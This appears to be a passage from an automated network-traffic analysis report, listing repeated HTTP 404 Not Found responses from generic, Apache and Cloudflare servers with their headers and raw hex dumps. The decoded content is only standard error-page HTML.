                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Content-Length: 1251Content-Type: text/htmlDate: Wed, 20 Nov 2024 08:23:40 GMTPragma: no-cacheConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Content-Length: 1251Content-Type: text/htmlDate: Wed, 20 Nov 2024 08:23:43 GMTPragma: no-cacheConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Content-Length: 1251Content-Type: text/htmlDate: Wed, 20 Nov 2024 08:23:45 GMTPragma: no-cacheConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Content-Length: 1251Content-Type: text/htmlDate: Wed, 20 Nov 2024 08:23:48 GMTPragma: no-cacheConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:24:08 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:24:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:24:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:24:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:24:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vytrQtgBdKwlAlT9EYzT6Cw0%2Bc%2Br1ZLd27pvzb2SIoHrqxxbiEO3QCFY%2B%2F7iaBU1AvcHHEVQG0JX5Sj2G9vAXeT%2B9QqALCXjCErxAhthD%2FAtUv7qKLrqAhCoiZj1hKVEP%2BXtC9RoPMnfLEM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e570b0f6d3d0c94-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1451&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:24:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jK6GRdkqr0V%2FcubRNuuDf7if%2BJagemLfpk3Qgir8VQFqkKxNWsRpTkr2sVxR0BKNkIvwM6iXmkHDZzjG3b2zNx6AZTjCDN%2FqEnKG6VD2q0FjuHfJOqnR4R%2BH2NwreTuYE7iXNUSPQV%2BfxE4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e570b1f2af441c3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2051&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=795&delivery_rate=0&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:24:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJxT0vs2sBoFq%2F3eft%2B6AfUPnysfAHJBCvGAXR80Koy0%2FbrZY2434rmA6GFJH8WqJtN6e0WLb3X77yochaZp35cAK3bRae%2BiD9qgDPT0O0bVo1%2BAyiS%2F6MHwQbmTmFv6m5vgjmGzxp8KcMw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e570b2f39057c82-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1787&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1808&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
